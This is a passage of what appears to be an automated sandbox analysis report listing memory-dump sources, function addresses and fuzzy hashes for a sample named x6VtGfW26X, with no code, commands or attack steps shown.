                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: `ibc
                                                                                        • API String ID: 2994545307-3725910391
                                                                                        • Opcode ID: 6a3b19841d2aeabecf837f2d6d868bf9124db2c26974597d6ab2e61f8c78fc74
                                                                                        • Instruction ID: 68c6305737256686377a60c37808dc71d64c6d96200c74bf2a09a2257640666c
                                                                                        • Opcode Fuzzy Hash: 6a3b19841d2aeabecf837f2d6d868bf9124db2c26974597d6ab2e61f8c78fc74
                                                                                        • Instruction Fuzzy Hash: 0191F3756183059BD7188F18C89167FB3E2EF99310F18852CE6958B396EB35EC51C782
                                                                                        Function 0086D057 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <
                                                                                        • API String ID: 0-4251816714
                                                                                        • Opcode ID: 6ad2fdc3ce7edecdaad05254877c0a562ed5a42c383e81fae756f558f8caee23
                                                                                        • Instruction ID: 0370129012abbc8103a8d218d71de9eed37f1617d32395ff7b5ed46bca3341e1
                                                                                        • Opcode Fuzzy Hash: 6ad2fdc3ce7edecdaad05254877c0a562ed5a42c383e81fae756f558f8caee23
                                                                                        • Instruction Fuzzy Hash: 66A19EB3F1162547F3540D38CC983A26682D7A5325F2F82788E98BB7C9D87E9D0953C4
                                                                                        Function 0085306A Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: F
                                                                                        • API String ID: 0-1304234792
                                                                                        • Opcode ID: f7867465b23a56fa26fb5474507fad267d220f77464da4228d92737fc36583f5
                                                                                        • Instruction ID: 9fab92e58e88c2c2c5fc790e58b167635396214136af631bb3789e3360086316
                                                                                        • Opcode Fuzzy Hash: f7867465b23a56fa26fb5474507fad267d220f77464da4228d92737fc36583f5
                                                                                        • Instruction Fuzzy Hash: 1CA16BB3F1162547F3944C69CC983A266839BE5321F2F42788E5CAB7C5ED7E5C0A5384
                                                                                        Function 008522DD Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: m
                                                                                        • API String ID: 0-3775001192
                                                                                        • Opcode ID: 529ac3f2c00426c7276f66f42ab7dbc19cbbdc3579d74bd07ea2b65a19c8824c
                                                                                        • Instruction ID: d014d0d017794fae830a29ed4b421bb090f4df412d6ba5294faac3af5d85b983
                                                                                        • Opcode Fuzzy Hash: 529ac3f2c00426c7276f66f42ab7dbc19cbbdc3579d74bd07ea2b65a19c8824c
                                                                                        • Instruction Fuzzy Hash: 4BA17BB3F115254BF3944929CC583A26683DBE4315F2F82788F48AB7C5E97E9C0A5384
                                                                                        Function 00825340 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: JS4
                                                                                        • API String ID: 0-2044837119
                                                                                        • Opcode ID: 4d035002f8f6689af73035ff8349bcf5004eb3e94a678f18c0a21f3ce3988b40
                                                                                        • Instruction ID: e9439ce85b0823d3e2db4b048257f6e1c0b32765c109c9339fdde7310d01f957
                                                                                        • Opcode Fuzzy Hash: 4d035002f8f6689af73035ff8349bcf5004eb3e94a678f18c0a21f3ce3988b40
                                                                                        • Instruction Fuzzy Hash: 36918DB3F116254BF3544C3ADC583A26683DBD5321F2F82788E58AB7C9DD7E5C0A5284
                                                                                        Function 008901AC Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w
                                                                                        • API String ID: 0-476252946
                                                                                        • Opcode ID: 4c783da5a8222002eacc9a7f5c47e7c3d74915e6b115c94d2d958d27096beceb
                                                                                        • Instruction ID: ca798b8e1b4a80fe3bbf6c45b9816403a67abaf49b0619cc6e86dc04dd8479aa
                                                                                        • Opcode Fuzzy Hash: 4c783da5a8222002eacc9a7f5c47e7c3d74915e6b115c94d2d958d27096beceb
                                                                                        • Instruction Fuzzy Hash: 0C915DF3F6162647F3584825CC683A266839BE1325F3F82388E596B7C5DD7E9D0A1384
                                                                                        Function 007CD260 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~
                                                                                        • API String ID: 0-1707062198
                                                                                        • Opcode ID: fce21a97053b326c15eb94a332be20e5676bcd6afa2728ddbd41dddb5d053cd1
                                                                                        • Instruction ID: a8a2f53eee41a715c41f5a904898fc210914f33256154ae20b665371b6a2978a
                                                                                        • Opcode Fuzzy Hash: fce21a97053b326c15eb94a332be20e5676bcd6afa2728ddbd41dddb5d053cd1
                                                                                        • Instruction Fuzzy Hash: E58149729042A14FC725CE28C85176EBBD1AB85324F19C27DECB99B392D238DD05D7D1
                                                                                        Function 0089C1B3 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ~)2
                                                                                        • API String ID: 0-2509891921
                                                                                        • Opcode ID: dae41f0b17c4c9659eac70ce38f6d087e0d55656b0d06adb7fe0b1a03ae710ad
                                                                                        • Instruction ID: 18c05a15d4d830c747fd09ca3199b7309aacf5039695310a4defadde7570a1ca
                                                                                        • Opcode Fuzzy Hash: dae41f0b17c4c9659eac70ce38f6d087e0d55656b0d06adb7fe0b1a03ae710ad
                                                                                        • Instruction Fuzzy Hash: 3B9169B3F1162987F3844D29CCA83A27653EBD5320F2F82388B596B7C5D93E5D0A5784
                                                                                        Function 00813138 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: W
                                                                                        • API String ID: 0-655174618
                                                                                        • Opcode ID: 82e9ac05d77dd37e861e579cdb2c5e8d953f4cdef10116e68fa3e94970526304
                                                                                        • Instruction ID: 564163d0a2ceec31cc2a964de9d3702599995d4f52ca3ca05ba747a1ebb33d24
                                                                                        • Opcode Fuzzy Hash: 82e9ac05d77dd37e861e579cdb2c5e8d953f4cdef10116e68fa3e94970526304
                                                                                        • Instruction Fuzzy Hash: 7E91ABB3F115248BF3844D68CC583A27683DBD5312F2F82388E18AB7D8DD7E6D0A5684
                                                                                        Function 008984C3 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A[@4
                                                                                        • API String ID: 0-3016268453
                                                                                        • Opcode ID: ca029753ec43fad44c9894c65463321ac9d2db307956242c0cc1bba7a8071f38
                                                                                        • Instruction ID: 27162236157f9d49052648c2d6209ce4582d7427082d3e584a251d8260336d3e
                                                                                        • Opcode Fuzzy Hash: ca029753ec43fad44c9894c65463321ac9d2db307956242c0cc1bba7a8071f38
                                                                                        • Instruction Fuzzy Hash: E181AEB3E116258BF3444D68CC983A27692EBD1321F2F82788E586B7C4D93E5D4A57C4
                                                                                        Function 0089700F Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: e
                                                                                        • API String ID: 0-4024072794
                                                                                        • Opcode ID: e7c83974cc47c12589c223e7bd9f09a64189cb8ea2d1a4e26504e1d8f61321f7
                                                                                        • Instruction ID: 9ea252b14fd3982a30eb4a74c6197768230aaadf43a6501192361de745773489
                                                                                        • Opcode Fuzzy Hash: e7c83974cc47c12589c223e7bd9f09a64189cb8ea2d1a4e26504e1d8f61321f7
                                                                                        • Instruction Fuzzy Hash: F0817CB3F116158BF3404D68CC883A27683DBD5311F2F81788E48AB7C5D97EAD4A5788
                                                                                        Function 00877111 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ;
                                                                                        • API String ID: 0-1661535913
                                                                                        • Opcode ID: b2c9d9e349a48b05eb4861d0bc5d7a892f930dca414a3e083c8f81723a3dbbfa
                                                                                        • Instruction ID: 59d3be1eff9f94ea59ef8939de327b1e4289f74639123567186f7a7275e7fd15
                                                                                        • Opcode Fuzzy Hash: b2c9d9e349a48b05eb4861d0bc5d7a892f930dca414a3e083c8f81723a3dbbfa
                                                                                        • Instruction Fuzzy Hash: 6B717FB3F5162547F3500D29CC983A276839BE5321F2F86788E9CAB3C5D87E9C0A5784
                                                                                        Function 0081A2E9 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
